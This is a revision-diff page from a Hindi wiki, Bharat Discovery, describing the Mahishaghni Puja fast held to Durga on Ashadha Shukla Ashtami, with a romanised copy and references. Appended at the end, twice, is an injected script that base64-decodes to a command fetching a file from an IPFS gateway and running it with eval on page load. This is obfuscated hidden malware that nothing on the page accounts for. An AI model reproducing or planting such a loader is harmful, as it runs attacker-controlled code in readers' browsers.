Difference between revisions of "महिषध्नी पूजा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (महिषध्नीपूजा का नाम बदलकर महिषध्नी पूजा कर दिया गया है)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[आषाढ़]] [[शुक्ल पक्ष|शुक्ल]] अष्टमी पर किया जाता है।  
 
*[[आषाढ़]] [[शुक्ल पक्ष|शुक्ल]] अष्टमी पर किया जाता है।  
*तिथि; [[देवता]] [[दुर्गा]]; महिषासुर को मारने वाली दुर्गा को हल्दी चूर्ण से युक्त जल से स्नान कराना चाहिए।  
+
*तिथि; [[देवता]] [[दुर्गा]]; [[महिषासुर]] को मारने वाली दुर्गा को हल्दी चूर्ण से युक्त जल से स्नान कराना चाहिए।  
 
*प्रतिमा पर चन्दन लेप एवं कर्पूर लगाना, कुमारियों एवं ब्राह्मणों को भोजन एवं दक्षिणा देना; दीप प्रकाश करना चिए।  
 
*प्रतिमा पर चन्दन लेप एवं कर्पूर लगाना, कुमारियों एवं ब्राह्मणों को भोजन एवं दक्षिणा देना; दीप प्रकाश करना चिए।  
*इस व्रत कोकरने से सभी कामनाओं की पूर्ति होती है <ref>पुरुषार्थचिन्तामणि (109-110)</ref>; <ref>स्मृतिकौस्तुभ (138)</ref>।
+
*इस व्रत को करने से सभी कामनाओं की पूर्ति होती है <ref>पुरुषार्थचिन्तामणि (109-110)</ref>; <ref>स्मृतिकौस्तुभ (138)</ref>।
  
  

Revision as of 11:17, 6 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • ashadh shukl ashtami par kiya jata hai.
  • tithi; devata durga; mahishasur ko marane vali durga ko haldi choorn se yukt jal se snan karana chahie.
  • pratima par chandan lep evan karpoor lagana, kumariyoan evan brahmanoan ko bhojan evan dakshina dena; dip prakash karana chie.
  • is vrat ko karane se sabhi kamanaoan ki poorti hoti hai [1]; [2].



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. purusharthachintamani (109-110)
  2. smritikaustubh (138)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>